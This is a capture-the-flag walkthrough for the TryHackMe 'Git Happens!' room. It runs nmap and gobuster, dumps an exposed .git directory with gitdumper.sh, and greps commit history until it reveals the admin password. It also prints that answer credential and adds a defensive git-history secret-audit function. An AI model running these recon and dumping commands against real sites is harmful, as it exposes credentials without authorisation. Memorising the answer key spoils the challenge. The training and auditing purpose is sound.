Git Happens! Try Hack Me “Capture the Flag” Walkthrough  : Benjamin Reitz

Post content below is copied from Finxter.

In this CTF (Capture the Flag) walkthrough, we will be working through the TryHackMe challenge, Git Happens!

If you don’t want any spoilers, I’d recommend trying out this free hacking challenge first before reading any further.

We’ll be hacking into a git repository and extracting the username:password combination for the administrative portal.

We’ll make use of gittools to extract the early git commits and comments. The final step is to use some clever command line text parsing to quickly narrow things down to our password and username.

First let’s export our IPs:

export myIP=10.6.2.23
export targetIP=10.10.122.132

Now we’ll go ahead and connect to the TryHackMe VPN from our Kali VM (Virtual Machine). In the walkthrough video, I am running Manjaro Linux with a virtual Kali machine running on Gnome Boxes. 

sudo openvpn kalisurfer.ovpn

Now that we are properly connected to our target machine let’s start the first phase of our hack.

ENUMERATION

Our standard Nmap scan has a few extra flags today to extend the functionality.

sudo nmap $targetIP -Pn -p- -sC -A -O -oN nmap-scan-results.txt
  • -Pn = stealth scan, skip host discovery
  • -p- = scan all ports
  • -sC = run standard scripts
  • -A = Enable OS detection, version detection, script scanning, and traceroute
  • -O = Detect operating system
  • -oN = output in normal format [filename]

Output:

# Nmap 7.93 scan initiated Tue Dec 13 10:51:00 2022 as: nmap -Pn -sC -p- -O -oN nmap-scan.txt 10.112.132
Nmap scan report for 10.112.132 (10.112.0.132)
Host is up (0.0012s latency).
All 65535 scanned ports on 10.112.132 (10.112.0.132) are in ignored states.
Not shown: 64535 filtered tcp ports (net-unreach), 1000 filtered tcp ports (no-response)
Too many fingerprints match this host to give specific OS details

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 13 10:54:32 2022 -- 1 IP address (1 host up) scanned in 212.47 seconds

WALKING THE WEBSITE

We discover a login page by pointing our browser at $targetIP. We try a few guesses of standard administrator user:password combinations without any luck.

  • admin:admin
  • admin:password
  • admin:password123

DIRECTORY SNIFFING WITH GOBUSTER

Next, we will sniff out directories with GoBuster. With the following command, we discover a hidden page at $targetIP/.git/

gobuster dir -w ~/hacking-tools/SecLists/Discovery/Web-Content/dirsearch.txt --url http://10.10.122.132

The hidden page looks like an index of the Git repo. We can download the files individually, but with Gittools we can extract even more metadata from the Git repo.

USING GITTOOLS TO EXTRACT REPO METADATA

First, we’ll download Gittools from the official Github repo.

After navigating into the new GitTools directory, we run the gitdumper.sh script with our target address and a download location.

Use the dumper:

./gitdumper.sh http://10.10.122.132/.git/ ~/THM/Git-Happens

Now we can view more details about the Git commits with the command ‘git log’.

COMMAND LINE TEXT PARSING

This next series of commands will help us to quickly narrow things down to our username:password combination.

git log | grep commit  

This command displays the list of commits and their hashes.

git log | grep commit | cut -d " " -f2

Now we cut out just the list of hashes. The cut -d " " -f2 part of the command splits each line into fields, using a space as the delimiter.

The -f2 displays only field 2. If this was an Excel spreadsheet, it is as if we are only viewing column 2.

Next, we’ll feed each hash from that output to git show <hash> using xargs.

git log | grep commit | cut -d " " -f2 | xargs git show

Let’s extend the command a bit further to save it to a .txt file.

git log | grep commit | cut -d " " -f2 | xargs git show > gitcommits.txt

We can look through this .txt file manually, but it is faster to use “grep password” to find text lines with the word “password”. 

cat gitcommits.txt | grep password
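An added example, not from the original post, of the last step done a little more carefully: instead of grepping every line for the word “password” (which also matches commit messages and removed lines), this POSIX shell function reads the same git show stream, keeps only added (+) lines that assign a quoted literal to a password/passwd/secret/token-like name, and tags each hit with the commit that introduced it. The function names, the sample git show output, the commit hashes and the secret value are all constructed placeholders; on a real repository you would pipe `git log --format=%H | xargs git show` into find_hardcoded_credentials to audit your own history before publishing.

```shell
# Added example, not from the original post. Reads a `git show` stream on
# stdin and prints only ADDED lines that assign a quoted literal to a
# credential-like name, prefixed with the commit that introduced them.
find_hardcoded_credentials() {
    awk '
        # each commit in the stream starts with a "commit <hash>" header
        /^commit [0-9a-f]+/ { hash = $2; next }
        # "+++ b/file" is a diff header, not an added line
        /^\+\+\+ / { next }
        # added lines: password/passwd/secret/token assigned a quoted literal
        /^\+/ && tolower($0) ~ /(password|passwd|secret|token)[^=]*= *["'"'"']/ {
            print hash ":" substr($0, 2)
        }
    '
}
# Constructed sample of `git show` output (placeholder hashes and secret):
# commit 111... hard-codes a password, commit 222... later "removes" it.
sample_git_show() {
    cat <<'EOF'
commit 1111111111111111111111111111111111111111
Author: Dev <dev@example.invalid>
Date:   Tue Dec 13 10:51:00 2022 -0500

    Add login handler

diff --git a/login.php b/login.php
--- /dev/null
+++ b/login.php
@@ -0,0 +1,3 @@
+<?php
+$username = "admin";
+$password = "PLACEHOLDER_SECRET";
commit 2222222222222222222222222222222222222222
Author: Dev <dev@example.invalid>
Date:   Wed Dec 14 09:00:00 2022 -0500

    Stop hardcoding the password; commit it to env config instead

diff --git a/login.php b/login.php
--- a/login.php
+++ b/login.php
@@ -1,3 +1,3 @@
 <?php
 $username = "admin";
-$password = "PLACEHOLDER_SECRET";
+$password = getenv("APP_PASSWORD");
EOF
}
```

Running `sample_git_show | find_hardcoded_credentials` reports the single line from commit 111... where the literal was introduced, while a plain `grep password` over the same stream returns four lines, including the later commit that only moved the value into an environment variable.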

And to find the username:

Now we can find the password in plaintext with a simple glance over the output.

Found it!

admin:Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!

Thanks for watching! Catch you next time.

Feel free to check out our other TryHackMe walkthrough:

👉 Recommended: Web Hacking 101: Solving the TryHackMe Pickle Rick “Capture The Flag” Challenge

Resources

The two tracks used as background music are used under creative commons licenses and were downloaded at https://freemusicarchive.org

  • Mr. Frisby’s Beat Pocket – Cool Fountains
  • Damiano Baldoni – Gothic trip with thunderhorse

December 15, 2022 at 04:23PM